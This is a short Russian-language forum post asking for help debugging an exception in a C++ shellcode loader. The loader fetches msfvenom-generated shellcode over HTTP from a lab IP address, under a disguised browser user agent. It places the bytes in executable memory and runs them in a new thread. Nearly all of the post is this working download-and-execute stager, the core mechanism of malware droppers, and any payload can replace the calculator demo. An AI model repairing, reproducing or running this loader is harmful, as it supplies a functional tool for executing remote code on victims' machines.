Всем привет, не много не могу разобраться почему именно вызывается исключение. Самое главное то , что shellcode выполняется , но вызывается исключение по адресу , хочу это исправить.Вызываюется исключение на моменте с WaitForSingleObject. Использовал shellcode вызова калькулятора, сгенерируемый через msfvenom. Веб сервер использовал python -m http.server 80 .Вот исходники
C++:
std::string url = "192.168.222.128";
std::string fileName = "calc.bin";
int port = 80;
HINTERNET hSession = NULL,
hConnect = NULL,
hRequest = NULL;
BOOL bResults = FALSE;
std::string path = "/";
fileName.insert(0, path);
// Use WinHttpOpen to obtain a session handle.
hSession = WinHttpOpen(L"Opera GX/1.0",
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, 0);
// Specify an HTTP server.
if (hSession)
hConnect = WinHttpConnect(hSession, std::wstring(url.begin(), url.end()).c_str(),
port, 0);
// Create an HTTP request handle.
if (hConnect)
hRequest = WinHttpOpenRequest(hConnect, L"GET", std::wstring(fileName.begin(), fileName.end()).c_str(),
NULL, WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
0);
if (hRequest)
bResults = WinHttpSendRequest(hRequest,
WINHTTP_NO_ADDITIONAL_HEADERS,
0, WINHTTP_NO_REQUEST_DATA, 0,
0, 0);
if (bResults)
bResults = WinHttpReceiveResponse(hRequest, NULL);
DWORD dwSize = 0;
DWORD dwDownloaded = 0;
PBYTE pszOutBuffer = NULL;
// Check for available data.
dwSize = 0;
if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
// Allocate space for the buffer.
pszOutBuffer = (PBYTE)malloc(dwSize + 1);
if (!pszOutBuffer)
{
printf("Out of memory\n");
dwSize = 0;
}
else
{
ZeroMemory(pszOutBuffer, dwSize + 1);
if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,
dwSize, &dwDownloaded))
printf("Error %u in WinHttpReadData.\n", GetLastError());
}
PVOID buffer = VirtualAlloc(0, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(buffer, pszOutBuffer, dwSize);
free(pszOutBuffer);
HANDLE hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);
WaitForSingleObject(hThread, -1);
free(buffer);
return 0;
Последнее редактирование: